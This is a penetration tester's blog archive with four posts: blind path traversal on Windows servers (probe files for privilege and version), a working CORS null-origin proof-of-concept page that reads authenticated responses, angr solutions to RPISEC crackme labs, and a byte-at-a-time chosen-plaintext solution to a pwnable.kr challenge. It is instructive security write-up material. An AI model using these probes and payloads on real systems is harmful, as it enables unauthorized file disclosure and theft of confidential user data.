Tuesday, 19 June 2018

Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems

In a recent engagement I was confronted with a blind path traversal vulnerability on a server running Microsoft Windows. That is, it was not possible to list folder contents; the complete file name and path had to be guessed. Since I could not find a single comprehensive resource, I had to gather information from various sources.

In this blog post, I want to summarize my findings and focus on the exploitation of this kind of vulnerability.
Admittedly, vanilla path traversal vulnerabilities have become somewhat rare and Microsoft Windows as a server operating system is also more of an exception than the rule. However, in an XXE scenario, you may encounter a similar situation.
Also, this post will not shed light on the detection of this vulnerability - which is an art in itself and has already been thoroughly documented. In a nutshell, the key to the successful detection is to guess the correct path of a world-readable file (with the correct encoding).

Identifying vulnerable Applications


On Microsoft Windows, the following files are good choices since they are present in almost every version:

c:\windows\system.ini
c:\windows\win.ini

Assuming you have successfully identified a path traversal vulnerability, the only question is how far it can be escalated. The major obstacle is that you usually have to know the exact location of the files you want to read in advance. As opposed to *nix-based operating systems, the locations can differ significantly from one Windows installation to another. For instance, the system drive letter may not be C:, or the administrator account may not be called Administrator.

First and foremost, we have to recall a few key characteristics of Windows operating systems:
  • Files and directories are handled case-insensitively: from an attacker's perspective, this makes life easier since we only have to probe one spelling of a given location. For example, it suffices to test for ../../windows/win.ini without also attempting ../../WINDOWS/win.ini.
  • Forward slashes and backslashes can be used interchangeably most of the time; e.g., ../..\../windows/win.ini is a valid file path in Windows.
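
The two properties above keep the list of probe strings short. A minimal sketch of a candidate generator, assuming the traversal depth is unknown and the application passes the string through unmodified. The function name and the default depth are my own choices, and URL encoding or double encoding is deliberately left out:

```python
def traversal_candidates(target="windows/win.ini", max_depth=8):
    """Build relative traversal strings for one target file.

    Only one spelling per path is generated, since Windows treats file
    names case-insensitively. Both slash styles are covered.
    """
    candidates = []
    for depth in range(1, max_depth + 1):
        for sep in ("/", "\\"):
            prefix = (".." + sep) * depth
            candidates.append(prefix + target.replace("/", sep))
    return candidates


if __name__ == "__main__":
    for candidate in traversal_candidates(max_depth=3):
        print(candidate)
```

Each candidate still has to be wrapped in whatever encoding the vulnerable parameter expects.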

Determining the Privilege Level of the reading Process


In order to assess the severity of a path traversal bug, you should determine the privilege level of the process that performs the file retrieval. From an attacker's perspective, the process should ideally run with elevated privileges, i.e. as LocalSystem (= root equivalent) or as a member of the Administrators group.

If you can successfully retrieve one of the following files, the reading process runs at least as a member of the Administrators group:


  • c:/documents and settings/administrator/ntuser.ini
  • c:/documents and settings/administrator/desktop/desktop.ini
  • c:/users/administrator/desktop/desktop.ini
  • c:/users/administrator/ntuser.ini


As already mentioned, there is a catch to this approach - there might be no such user account. In this case, you have to guess the name of an administrator account.

In contrast, the following files should be available on all modern Windows operating systems and are independent of the setup:


  • c:/system volume information/wpsettings.dat
  • C:/Windows/CSC/v2.0.6/pq
  • C:/Windows/CSC/v2.0.6/sm
  • C:/$Recycle.Bin/S-1-5-18/desktop.ini


If you can read any of these files, the file reading process has LocalSystem privileges.
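
The two probe lists can be combined into a small decision routine. This is only a sketch: `can_read` is a hypothetical callable that you would have to implement around the vulnerable request and that returns True when the file content comes back. The label "undetermined" is my own, since a failed probe may simply mean that no account named administrator exists.

```python
ADMIN_PROBES = [
    "c:/documents and settings/administrator/ntuser.ini",
    "c:/documents and settings/administrator/desktop/desktop.ini",
    "c:/users/administrator/desktop/desktop.ini",
    "c:/users/administrator/ntuser.ini",
]

SYSTEM_PROBES = [
    "c:/system volume information/wpsettings.dat",
    "c:/windows/csc/v2.0.6/pq",
    "c:/windows/csc/v2.0.6/sm",
    "c:/$recycle.bin/s-1-5-18/desktop.ini",
]


def classify_privileges(can_read):
    """Map probe results to the privilege levels discussed above."""
    # Check the LocalSystem probes first: they imply the highest level.
    if any(can_read(path) for path in SYSTEM_PROBES):
        return "LocalSystem"
    if any(can_read(path) for path in ADMIN_PROBES):
        return "Administrators"
    return "undetermined"
```

Lower-case paths are sufficient here because of the case-insensitive file handling mentioned earlier.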

Determining the Windows Version


Moreover, you should determine the exact version of Microsoft Windows. On Linux this is again far simpler, since we can read files such as the following:

  • /etc/issue
  • /etc/*release
  • /proc/version


Up until Windows 10, there is a similar file also containing version information, namely at

  • c:/windows/system32/license.rtf

It is also present on Windows 10, but it does not contain version information there (a fact that can itself serve as a blind indicator).
The best way, however, is to retrieve a Microsoft-compiled executable from the target system and analyze the included version information in the "file properties" tab. Possible candidates are:

  • c:/windows/explorer.exe
  • c:/windows/notepad.exe
  • c:/windows/system32/ntoskrnl.exe

Afterwards, you can consult the following table to look up the corresponding operating system version:

  • 10.0 = Windows 10 / Windows Server 2016
  • 6.3 = Windows 8.1 / Windows Server 2012 R2
  • 6.2 = Windows 8 / Windows Server 2012
  • 6.1 = Windows 7 / Windows Server 2008 R2
  • 6.0 = Windows Vista / Windows Server 2008
  • 5.2 = Windows XP 64 Bit / Windows Server 2003
  • 5.1 = Windows XP
  • 5.0 = Windows 2000
  • 4.0 = Windows NT 4

Instead of the file properties tab, you can also use the pefile package for Python to read the version number as follows:
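
A minimal sketch, assuming the third-party pefile package is installed and the downloaded executable carries a version resource (otherwise the VS_FIXEDFILEINFO attribute is missing). The helper names and the lookup dictionary are my own; the dictionary simply restates the table above.

```python
WINDOWS_VERSIONS = {
    (10, 0): "Windows 10 / Windows Server 2016",
    (6, 3): "Windows 8.1 / Windows Server 2012 R2",
    (6, 2): "Windows 8 / Windows Server 2012",
    (6, 1): "Windows 7 / Windows Server 2008 R2",
    (6, 0): "Windows Vista / Windows Server 2008",
    (5, 2): "Windows XP 64 Bit / Windows Server 2003",
    (5, 1): "Windows XP",
    (5, 0): "Windows 2000",
    (4, 0): "Windows NT 4",
}


def split_version(ms, ls):
    """Split dwFileVersionMS / dwFileVersionLS into four 16-bit parts."""
    return (ms >> 16, ms & 0xFFFF, ls >> 16, ls & 0xFFFF)


def lookup_os(major, minor):
    return WINDOWS_VERSIONS.get((major, minor), "unknown")


def file_version(path):
    """Read the fixed file version of a PE file (requires pefile)."""
    import pefile  # third-party: pip install pefile

    pe = pefile.PE(path)
    info = pe.VS_FIXEDFILEINFO
    if isinstance(info, list):  # newer pefile releases expose a list
        info = info[0]
    return split_version(info.FileVersionMS, info.FileVersionLS)
```

For a retrieved copy of explorer.exe, `lookup_os(*file_version("explorer.exe")[:2])` would then give the matching table entry.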



Fine-tuning



To exploit the full potential of the path traversal vulnerability, you will likely have to perform an educated brute-force or dictionary attack, as the "interesting" files are technology-dependent.

The following list may be helpful as a first step and I would appreciate any additions or comments to this list:

https://github.com/soffensive/windowsblindread


References and follow-up links:

Web Application Hacker's Handbook, 2nd Edition
https://www.owasp.org/index.php/Testing_Directory_traversal/file_include_(OTG-AUTHZ-001)
https://github.com/mubix/post-exploitation-wiki/blob/master/windows/files.md
http://pwnwiki.io/#!presence/windows/blind.md
https://blog.netspi.com/smb-attacks-through-directory-traversal/
https://digi.ninja/blog/when_all_you_can_do_is_read.php
https://superuser.com/questions/363018/how-do-i-tell-what-version-and-edition-of-windows-is-on-the-filesystem
https://docs.microsoft.com/en-us/windows/desktop/sysinfo/operating-system-version
https://docs.microsoft.com/en-us/windows/desktop/api/verrsrc/ns-verrsrc-tagvs_fixedfileinfo
https://stackoverflow.com/questions/1264472/using-the-pefile-py-to-get-file-exe-version

Monday, 23 April 2018

Exploiting misconfigured CORS Null Origin

Almost two years ago, in October 2016, James Kettle published an excellent blog post about the various types of Cross-Origin Resource Sharing (CORS) misconfigurations and how they can be exploited.

Recently, I encountered a web application that allowed for two-way interaction with the so-called null origin. More precisely, when sending an HTTP request specifying the header:

Origin: null

the server would respond with the following two HTTP headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

This configuration allows us to issue arbitrary requests to the application and read the responses, as long as we can set the Origin header to null. According to Kettle's blog post, it can be exploited by issuing the request from within an iframe using a data URL as follows:

<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>

Although the code above points in the right direction, it is not a complete proof of concept. I struggled to find code that would work in both Chrome and Firefox, but eventually succeeded with the following snippet:

<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
    if (xhr.readyState === xhr.DONE) {
            console.log(xhr.response);
    }
};
xhr.send(null);
</script>'></iframe>

</body>
</html>

As soon as the page from above is opened, a request to https://vuln-app.com/confidential should be issued with an Origin: null HTTP header and the corresponding HTTP response should be shown in the browser console.
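
Whether a target shows this behaviour in the first place can be checked without a browser. A minimal sketch using only the Python standard library; the function names are my own, and `probe()` assumes the endpoint answers a plain unauthenticated GET (urlopen raises an HTTPError on 4xx/5xx responses, which is not handled here):

```python
import urllib.request


def reflects_null_origin(headers):
    """True if the response headers trust the null origin with credentials."""
    allow_origin = headers.get("Access-Control-Allow-Origin", "")
    allow_creds = headers.get("Access-Control-Allow-Credentials", "")
    return allow_origin.strip() == "null" and allow_creds.strip() == "true"


def probe(url, timeout=10):
    """Send a request with 'Origin: null' and inspect the CORS headers."""
    request = urllib.request.Request(url, headers={"Origin": "null"})
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return reflects_null_origin(response.headers)
```

Calling `probe("https://vuln-app.com/confidential")` against the example host used above would return True for the misconfiguration described in this post.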

Wednesday, 21 February 2018

Using angr and symbolic execution for reverse engineering challenges (RPI MBE Labs)

This blog post highlights how you can use the angr dynamic binary analysis framework and symbolic execution for reverse engineering tasks.

More precisely, we will look at the first two tasks in lab1 of the RPISEC MBE labs.

While angr's internals are quite complex and take substantial effort to master, getting started with our simple examples does not require much knowledge.

The first example we will look at is lab1C from lab01, which requires the user to enter a certain password:

./lab1C
-----------------------------
--- RPISEC - CrackMe v1.0 ---
-----------------------------

Password: bluab

Invalid Password!!!

When inspecting the program's disassembly, we see that the argument for system() is set up at address 0x08048711 and the call follows right after:

Disassembly of lab1C:

   0x080486ad <+0>: push   ebp
   0x080486ae <+1>: mov    ebp,esp
   0x080486b0 <+3>: and    esp,0xfffffff0
   0x080486b3 <+6>: sub    esp,0x20
   0x080486b6 <+9>: mov    DWORD PTR [esp],0x80487d0
   0x080486bd <+16>: call   0x8048560 <puts@plt>
   0x080486c2 <+21>: mov    DWORD PTR [esp],0x80487ee
   0x080486c9 <+28>: call   0x8048560 <puts@plt>
   0x080486ce <+33>: mov    DWORD PTR [esp],0x80487d0
   0x080486d5 <+40>: call   0x8048560 <puts@plt>
   0x080486da <+45>: mov    DWORD PTR [esp],0x804880c
   0x080486e1 <+52>: call   0x8048550 <printf@plt>
   0x080486e6 <+57>: lea    eax,[esp+0x1c]
   0x080486ea <+61>: mov    DWORD PTR [esp+0x4],eax
   0x080486ee <+65>: mov    DWORD PTR [esp],0x8048818
   0x080486f5 <+72>: call   0x80485a0 <__isoc99_scanf@plt>
   0x080486fa <+77>: mov    eax,DWORD PTR [esp+0x1c]
   0x080486fe <+81>: cmp    eax,0x149a
   0x08048703 <+86>: jne    0x8048724 <main+119>
   0x08048705 <+88>: mov    DWORD PTR [esp],0x804881b
   0x0804870c <+95>: call   0x8048560 <puts@plt>
   0x08048711 <+100>: mov    DWORD PTR [esp],0x804882b
   0x08048718 <+107>: call   0x8048570 <system@plt>
   0x0804871d <+112>: mov    eax,0x0
   0x08048722 <+117>: jmp    0x8048735 <main+136>
   0x08048724 <+119>: mov    DWORD PTR [esp],0x8048833
   0x0804872b <+126>: call   0x8048560 <puts@plt>
   0x08048730 <+131>: mov    eax,0x1
   0x08048735 <+136>: leave  
   0x08048736 <+137>: ret    

Without looking further at the program logic, we have enough information to create a little script that invokes angr and lets it help us with the challenge:
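
A minimal sketch of such a script, assuming angr is installed and the binary sits at ./lab1C (the path, the constant names and the function name are my own choices):

```python
BINARY = "./lab1C"        # assumed location of the challenge binary
FIND_ADDR = 0x08048711    # argument setup for system(), from the disassembly


def solve(binary=BINARY, find_addr=FIND_ADDR):
    """Return the stdin bytes that drive execution to find_addr, or None."""
    import angr  # third-party: pip install angr

    # Skip loading shared libraries; angr then models libc calls itself.
    project = angr.Project(binary, auto_load_libs=False)
    state = project.factory.entry_state()
    simgr = project.factory.simulation_manager(state)

    # Explore symbolically until some state reaches the target address.
    simgr.explore(find=find_addr)
    if not simgr.found:
        return None

    # File descriptor 0 is stdin: dump the input of the first match.
    return simgr.found[0].posix.dumps(0)
```

Printing the return value of `solve()` gives the satisfying input.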




The main part of angr that is relevant to us is the SimulationManager object that guides the symbolic execution engine. We specify that we want to find an execution that reaches address 0x08048711 and start the symbolic execution of the program. After an execution has reached the address, we are interested in the input that led to the satisfying execution, which we can retrieve by specifying the file descriptor of stdin, which is 0.
Within a few seconds, the following output is generated:

python solve-lab1C.py
WARNING | 2018-02-21 13:12:01,239 | angr.analyses.disassembly_utils | Your verison of capstone does not support MIPS instruction groups.
WARNING | 2018-02-21 13:12:02,652 | angr.state_plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing.
We found a satisfying input: +0000005274
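
The reported input can be cross-checked by hand against the comparison cmp eax,0x149a in the disassembly. A small sketch, assuming the scanf format string at 0x8048818 reads a signed decimal integer (the string itself is not shown in the listing):

```python
EXPECTED = 0x149a  # immediate operand of the cmp instruction at main+81


def passes_check(stdin_data):
    """Mimic the integer comparison performed by lab1C."""
    # int() accepts an optional sign and leading zeros, much like "%d".
    return int(stdin_data.decode().strip()) == EXPECTED
```

Since 0x149a is 5274 in decimal, the input found by angr passes this check.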

While the program lab1C just compares the input to a hard-coded value, lab1B is a little more complicated. To the user it looks the same as lab1C, as a password has to be provided:

./lab1B 
.---------------------------.
|-- RPISEC - CrackMe v2.0 --|
'---------------------------'

Password: asas

Invalid Password!

Again, we first have a look at its disassembly, in particular the decrypt function:

Dump of assembler code for function decrypt:
   0x080489b7 <+0>: push   ebp
   0x080489b8 <+1>: mov    ebp,esp
   0x080489ba <+3>: sub    esp,0x38
   0x080489bd <+6>: mov    eax,gs:0x14
   0x080489c3 <+12>: mov    DWORD PTR [ebp-0xc],eax
   0x080489c6 <+15>: xor    eax,eax
   0x080489c8 <+17>: mov    DWORD PTR [ebp-0x1d],0x757c7d51
   0x080489cf <+24>: mov    DWORD PTR [ebp-0x19],0x67667360
   0x080489d6 <+31>: mov    DWORD PTR [ebp-0x15],0x7b66737e
   0x080489dd <+38>: mov    DWORD PTR [ebp-0x11],0x33617c7d
   0x080489e4 <+45>: mov    BYTE PTR [ebp-0xd],0x0
   0x080489e8 <+49>: push   eax
   0x080489e9 <+50>: xor    eax,eax
   0x080489eb <+52>: je     0x80489f0 <decrypt+57>
   0x080489ed <+54>: add    esp,0x4
   0x080489f0 <+57>: pop    eax
   0x080489f1 <+58>: lea    eax,[ebp-0x1d]
   0x080489f4 <+61>: mov    DWORD PTR [esp],eax
   0x080489f7 <+64>: call   0x8048810 <strlen@plt>
   0x080489fc <+69>: mov    DWORD PTR [ebp-0x24],eax
   0x080489ff <+72>: mov    DWORD PTR [ebp-0x28],0x0
   0x08048a06 <+79>: jmp    0x8048a28 <decrypt+113>
   0x08048a08 <+81>: lea    edx,[ebp-0x1d]
   0x08048a0b <+84>: mov    eax,DWORD PTR [ebp-0x28]
   0x08048a0e <+87>: add    eax,edx
   0x08048a10 <+89>: movzx  eax,BYTE PTR [eax]
   0x08048a13 <+92>: mov    edx,eax
   0x08048a15 <+94>: mov    eax,DWORD PTR [ebp+0x8]
   0x08048a18 <+97>: xor    eax,edx
   0x08048a1a <+99>: lea    ecx,[ebp-0x1d]
   0x08048a1d <+102>: mov    edx,DWORD PTR [ebp-0x28]
   0x08048a20 <+105>: add    edx,ecx
   0x08048a22 <+107>: mov    BYTE PTR [edx],al
   0x08048a24 <+109>: add    DWORD PTR [ebp-0x28],0x1
   0x08048a28 <+113>: mov    eax,DWORD PTR [ebp-0x28]
   0x08048a2b <+116>: cmp    eax,DWORD PTR [ebp-0x24]
   0x08048a2e <+119>: jb     0x8048a08 <decrypt+81>
   0x08048a30 <+121>: mov    DWORD PTR [esp+0x4],0x8048d03
   0x08048a38 <+129>: lea    eax,[ebp-0x1d]
   0x08048a3b <+132>: mov    DWORD PTR [esp],eax
   0x08048a3e <+135>: call   0x8048770 <strcmp@plt>
   0x08048a43 <+140>: test   eax,eax
   0x08048a45 <+142>: jne    0x8048a55 <decrypt+158>
   0x08048a47 <+144>: mov    DWORD PTR [esp],0x8048d14
   0x08048a4e <+151>: call   0x80487e0 <system@plt>
   0x08048a53 <+156>: jmp    0x8048a61 <decrypt+170>
   0x08048a55 <+158>: mov    DWORD PTR [esp],0x8048d1c
   0x08048a5c <+165>: call   0x80487d0 <puts@plt>
   0x08048a61 <+170>: mov    eax,DWORD PTR [ebp-0xc]
   0x08048a64 <+173>: xor    eax,DWORD PTR gs:0x14
   0x08048a6b <+180>: je     0x8048a72 <decrypt+187>
   0x08048a6d <+182>: call   0x80487c0 <__stack_chk_fail@plt>
   0x08048a72 <+187>: leave  
   0x08048a73 <+188>: ret    
End of assembler dump.
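
The loop between decrypt+81 and decrypt+119 XORs every byte of the 16-byte buffer at ebp-0x1d with the function argument and writes back only the low byte (al). A minimal sketch that reproduces this step, assuming the four immediates are laid out little-endian as usual on x86; the names are my own:

```python
import struct

# The four DWORD immediates written to ebp-0x1d .. ebp-0x11.
IMMEDIATES = (0x757c7d51, 0x67667360, 0x7b66737e, 0x33617c7d)
ENCRYPTED = b"".join(struct.pack("<I", value) for value in IMMEDIATES)


def decrypt(key):
    """XOR the buffer with the low byte of key, as the loop does."""
    return bytes(byte ^ (key & 0xFF) for byte in ENCRYPTED)


if __name__ == "__main__":
    # Only 256 keys are possible, so simply list the printable results.
    for key in range(256):
        candidate = decrypt(key)
        if all(0x20 <= byte < 0x7F for byte in candidate):
            print(hex(key), candidate)
```

With the key 0x12 the buffer decodes to b"Congratulations!". The listing does not show the string at 0x8048d03 that strcmp compares against, so treating this as the expected value is an assumption.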

Here, too, the goal is to reach the call to system() with a specific argument, which is set up at address 0x08048a47. The solving script is thus almost identical to the previous example:
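
Again only a sketch under the same assumptions as before (angr installed, binary at ./lab1B, names chosen by me); only the path and the target address change:

```python
BINARY = "./lab1B"        # assumed location of the challenge binary
FIND_ADDR = 0x08048a47    # argument setup for system() inside decrypt()


def solve(binary=BINARY, find_addr=FIND_ADDR):
    """Return the stdin bytes that reach find_addr, or None."""
    import angr  # third-party: pip install angr

    project = angr.Project(binary, auto_load_libs=False)
    simgr = project.factory.simulation_manager(project.factory.entry_state())
    simgr.explore(find=find_addr)

    # Dump stdin (file descriptor 0) of the first state that got there.
    return simgr.found[0].posix.dumps(0) if simgr.found else None
```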

Running it, however, takes more time, since angr has to explore several conditional branches and check their satisfiability:

python solve-lab1B.py 
WARNING | 2018-02-21 12:35:23,576 | angr.analyses.disassembly_utils | Your verison of capstone does not support MIPS instruction groups.
WARNING | 2018-02-21 12:35:25,180 | angr.state_plugins.symbolic_memory | Concretizing symbolic length. Much sad; think about implementing.
We found a satisfying input: +0322424827Z

Further examples that showcase applying angr to challenges of this kind are available in the GitHub repository of the angr developers.

Tuesday, 23 January 2018

pwnable.kr: crypto1 challenge

In the pwnable.kr challenge crypto1 in the rookies section, we are given the following two files client.py and server.py:



Furthermore, there is a running instance of client.py at pwnable.kr on port 9006. Our goal is to connect to this service and retrieve the flag.

We can infer from the two files the following facts:
  1. The only user-controlled inputs are the username and password strings.
  2. AES-128 (default) is used in CBC mode to encrypt the string "username-password-cookie".
  3. Before the plain text is processed by AES, it is padded with NULL values (\x00)
  4. The function request_auth() will show us for every supplied username and password the corresponding cipher text
  5. The password of a user is simply the SHA256 sum of the string "username"+"cookie" (+ denotes concatenation here). Thus, the password depends only on the username and the cookie value.
  6. The initialization vector is constant.
  7. We are given credentials for the user guest: guest / 8b465d23cb778d3636bf6c4c5e30d031675fd95cec7afea497d36146783fd3a1
  8. The flag will be read by client.py if and only if the return value retrieved from server.py is neither 0 nor 1.
  9. server.py returns a value other than 0 or 1 only when the username is admin and the correct password is supplied for this user.
  10. As we know from (5), the password of admin can be computed once the secret cookie value is known.
  11. The username and password can only consist of values of the following character set:  '1234567890abcdefghijklmnopqrstuvwxyz-_'.
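
Facts (5) and (10) boil down to a single hash computation. A minimal sketch, assuming the hex digest is used as the password (which matches the format of the guest credentials in (7)); the function name is my own:

```python
import hashlib


def derive_password(username, cookie):
    """Password = SHA256(username + cookie), as a hex string."""
    return hashlib.sha256((username + cookie).encode()).hexdigest()
```

Once the cookie is known, `derive_password("admin", cookie)` yields the admin password.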

There are numerous ways of approaching this challenge, and it definitely helps to have a good understanding of common cryptographic engineering problems and pitfalls.
I initially thought about whether it would be possible to somehow infer information about the cookie from the provided credentials of the user "guest".

However, the key to the challenge is to utilize the cipher text oracle and perform a chosen-plaintext attack. Hence, we have to understand which parts of the input change the corresponding parts of the output. 

AES is a block cipher and operates on a block size of 16 bytes. Thus it is advisable to divide the cipher text into chunks of this size and choose different input parameters. Furthermore, we have to recall how our input is transformed BEFORE it is supplied as a plain text to the encryption routine.
The username is the first content of the plain text, followed by a single "-", the password, another "-" character and lastly the cookie.

When we choose a username of at least 16 bytes, we note that the first 16 bytes of cipher text depend entirely on the username. For example, a username beginning with 16 'a' characters, i.e. "aaaaaaaaaaaaaaaa", will always cause the first block of cipher text to be equal to "166827d3124ce5db2b36e803b9115a49", irrespective of the other characters of the username or the password.

When we choose exactly 15 times the character 'a' as the username, we know that the first 16 bytes of the actual plain text will be  "aaaaaaaaaaaaaaa-", since the encryption routine will append a trailing "-" as a delimiter between the username and password.
Similarly, when we choose exactly 14 times the character 'a' and an empty password, we know that the first 16 bytes of the actual plain text fed into AES will be "aaaaaaaaaaaaaa--". This is due to the fact that the password is empty and an additional "-" will be appended by the function "request_auth" as a delimiter between the password and the cookie.

Now we arrive at the point where the actual magic happens. What if we choose exactly 13 times the character "a" as the username and an empty password? As you correctly guessed, the function "request_auth" will append two "-" characters. Furthermore, it will append the first byte of the secret cookie value! 
Yet, as we can only see the cipher text, we do not immediately know the corresponding plain text. But we can save the 16 bytes of cipher text as a reference block and compute cipher text blocks for all possible values of the first cookie byte. As soon as the computed cipher text block is equal to the reference block, we know we have correctly guessed the cookie byte value! This whole procedure is also known as one-byte-at-a-time decryption.
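
The block alignment for the three username lengths can be made visible with a few lines of Python. This is just an illustration of the plain text layout; the function name is my own and any cookie value passed in is a placeholder, not the real secret:

```python
BLOCK_SIZE = 16  # AES block size in bytes


def plaintext_blocks(username, password, cookie):
    """Split "username-password-cookie" into 16-byte chunks (no padding)."""
    plaintext = "{}-{}-{}".format(username, password, cookie)
    return [plaintext[i:i + BLOCK_SIZE]
            for i in range(0, len(plaintext), BLOCK_SIZE)]
```

With 15, 14 and 13 'a' characters and an empty password, the first block ends in "-", "--" and "--" plus the first cookie character, respectively.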

The details of the actual attack are a little bit more intricate, since we cannot directly compute cipher texts but have to rely on the "request_auth" function, which will append "-" characters. 
Concerning the guess of the first cookie byte: for the reference block we choose a username of 13 "-" characters. For the subsequent guesses, we choose a username consisting of 15 "-" characters followed by a 16th character, the guessed cookie byte value.
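
The procedure can be sketched end to end against a local stand-in oracle. Everything here is an assumption made for illustration: `make_oracle()` is not AES but a keyed, deterministic CBC-style chain built from HMAC (so the example needs nothing beyond the standard library), the cookie is assumed to consist only of characters from the allowed set, and no limit on the username length is enforced. Against the real service, `request_auth` would have to be replaced by a function that talks to port 9006.

```python
import hashlib
import hmac

BLOCK = 16
CHARSET = "1234567890abcdefghijklmnopqrstuvwxyz-_"


def make_oracle(cookie, key=b"demo-key"):
    """Local stand-in for request_auth(): NOT AES, only CBC-like chaining."""
    def request_auth(username, password):
        data = "{}-{}-{}".format(username, password, cookie).encode()
        data += b"\x00" * (-len(data) % BLOCK)       # NULL padding
        prev, out = b"\x00" * BLOCK, b""             # constant IV
        for i in range(0, len(data), BLOCK):
            mixed = bytes(a ^ b for a, b in zip(data[i:i + BLOCK], prev))
            prev = hmac.new(key, mixed, hashlib.sha256).digest()[:BLOCK]
            out += prev
        return out.hex()
    return request_auth


def recover_cookie(request_auth, max_len=64):
    """One-byte-at-a-time recovery of the cookie via the cipher text oracle."""
    known = ""
    for i in range(max_len):
        pad = (13 - i) % BLOCK            # puts cookie[i] last in a block
        block = (pad + 2 + i) // BLOCK    # index of that block
        lo, hi = 2 * BLOCK * block, 2 * BLOCK * (block + 1)  # hex offsets
        reference = request_auth("-" * pad, "")[lo:hi]
        for guess in CHARSET:
            probe = "-" * pad + "--" + known + guess
            if request_auth(probe, "")[lo:hi] == reference:
                known += guess
                break
        else:
            return known                  # no match: end of cookie reached
    return known
```

For the first byte this reproduces the choice described above: a reference username of 13 "-" characters and guesses of 15 "-" characters plus the candidate. For later bytes the already recovered part of the cookie is placed in front of the candidate.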

You are highly encouraged to work out a fully working decryption routine yourself. Once you have completed it, try a variant of the attack that keeps the username constant and alters the password instead.
For the sake of completeness, here is my proposed solution: